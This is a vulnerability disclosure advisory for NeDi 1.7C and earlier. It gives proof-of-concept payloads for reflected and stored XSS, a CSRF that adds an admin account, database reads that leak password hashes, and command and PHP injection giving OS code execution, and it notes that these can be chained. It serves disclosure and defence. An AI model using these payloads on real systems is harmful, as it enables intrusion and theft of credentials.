Vulnerability Disclosure

Multiple critical vulnerabilities found in NeDi

Product: NeDi
Vendor: NeDi Consulting GmbH
Version: <= 1.7C
Found: 2018-10-24
By: Oscar Arnflo
oscar@sakerhetskontoret.com
[Show TXT-version]

Summary

Several critical vulnerabilities has been found in NeDi version <= 1.7C.
The most severe giving any remote authenticated user full OS code execution (see 5.3).
But by chaining multiple exploits together it is possible for a remote unauthenticated
attacker to gain full OS code execution.
                

Product description

"NeDi discovers your network devices and tracks connected end-nodes. It 
contains many additional features for
managing enterprise networks:

* Intelligent topology awareness
* MAC address mapping/tracking
* Traffic, error, discard and broadcast graphing with threshold based alerting
* Uptime, BGP peer and interface status monitoring
* Correlate syslog messages and traps with discovery events
* Network maps for documentation and monitoring dashboards
* Detecti rouge access points and find missing devices
* Extensive reporting ranging from devices, modules, interfaces all the way to
  assets and nodes"

https://www.nedi.ch/
                

Vulnerability description

1. XSS Reflected

The endpoint /mh.php suffers from a XSS vulnerability the GET-parameter, reg.
This allows for an UNAUTHENTICATED USER to execute code in the victims browser.
If the victim is an authenticated user it is possible for an attacker to
escalate privileges(see point 3), code execution(see 5).

PoC:
    /mh.php?reg=%3Cimg%20src=%22%22%20onerror=%22alert(%27XSS%27);%22%3E
    (Verified in Firefox)
    
    
    
Also verified against version 1.8 DEMO:
http://95.143.60.30/mh.php?reg=%3Cimg%20src=%22%22%20onerror=%22alert(%27XSS%27);%22%3E
                

2. XSS Stored

The endpoint /User-Chat.php suffers from a XSS vulnerability.
By posting a message containing a link it is possible to add extra attributes to
the a-tag created by the server side.

PoC:
   This message will trigger XSS when the victim hovers over the hyperlink: 
    Check out my website: http://google.se"onmouseover="alert('XSS')
    
    
    

Affected source code:
   User-Chat.php, Line 73.
                

3. CSRF Privilege escalation

The endpoint User-Management.php does not protect against a CSRF-attack.
It makes it possible for an attacker to send a link or in any other way(see 1 and 2) 
get a high-priv user to create a new user.

PoC:
    If a high-priv user visits this url, a new user test with password test will
    be created:
       /User-Management.php?grp=&ord=&usr=test&eml=&phn=&add=Add

    And this would give the user test admin privileges:
       /User-Management.php?grp=&ord=&usr=test&gup=1

    Simply by putting this code on a attacker controlled webpage would make any administrative user
    in NeDi, create and elevate a new user to administrator.
        <img src="http://nedi-host/User-Management.php?grp=&ord=&usr=test&eml=&phn=&add=Add">
        <img src="http://nedi-host/User-Management.php?grp=&ord=&usr=test&gup=1">

Affected source code:
    User-Management.php
                

4. SQL Injection / Arbitrary read from database

The endpoint query.php allows ANY user to read from the database, making it possible
for an attacker to steal password-hashes, etc.

PoC:
    Fetch all users password hashes with user(test:test) :
    curl -k -d "u=test&p=test&t=users" "https://192.168.219.104/query.php"

    OUTPUT (prettified & truncated):
        [
           {
              "sysname":"Linux",
              "nodename":"ubuntu",
              "release":"4.4.0-131-generic",
              "version":"#157-Ubuntu SMP Thu Jul 12 15:51:36 UTC 2018",
              "machine":"x86_64",
              "nedi":"1.7.090"
           },
           {
              "usrname":"admin",
              "password":"3cac26b5bd6addd1ba4f9c96a58ff8c2c2c8ac15018f61240f150a4a968b8562",
              "groups":"255",
              "email":"",
              "phone":"",
              "time":"1540356294",
              "lastlogin":"1540372827",
              "comment":"default admin",
              "language":"english",
              "theme":"default",
              "volume":"75",
              "columns":"8",
              "msglimit":"10",
              "miscopts":"35",
              "dateformat":"j.M y G:i470",
              "viewdev":""
           },...
        ]

Affected source code:
    query.php
                

5. Code Execution

Multiple endpoints was found vulnerable to command injection giving full OS code execution
for a low-prived authenticated user.

ALSO NOTE that the following endpoints are also vulnerable to a CSRF-attack, which means
in a worst case scenario; giving full OS code execution to an UNAUTHENTICATED USER.
                
5.1 Helpdesk User
 The endpoint /Nodes-Traffic.php and the GET-parameter flt is vulnerable to command injection.
 Giving the user type "Helpdesk" code execution.

 PoC:
    /Nodes-Traffic.php?in%5B%5D=&ord=byt&flt=%27%3Bid%3B%23&stt=10%2F24%2F2018+07%3A15&dur=5&lir=10&cha=&tis=0&tie=0&sho=Show
    
    
    

 Affected source code:
    Nodes-Traffic.php, line 424.
                
5.2 Network User
 The endpoint /Devices-Graph.php and the GET-parameter dv is vulnerable to command injection.
 Giving the user type "Network" code execution.
 
 PoC:
    /Devices-Graph.php?stt=10%2F19%2F2018+09%3A20&dur=7200&sze=&mon=&sho=Show&cad=1&dv=%22;id;%23
    
    
    


 Affected source code:
    Devices-Graph.php, line 210.
                
5.3 ANY Authenticated User
 The endpoint /drawmap.php and the GET-parameter tit is vulnerable to code injection,
 allowing ANY authenticated user to run PHP-code and thus also giving OS code execution on the server.
 
 PoC:
    /drawmap.php?cmd=id&tit=%22.shell_exec($_GET[%27cmd%27]),$black);+//
    
    
    

 Affected source code:
    drawmap.php, line 108
    inc/libmap.php, line 88 & line 92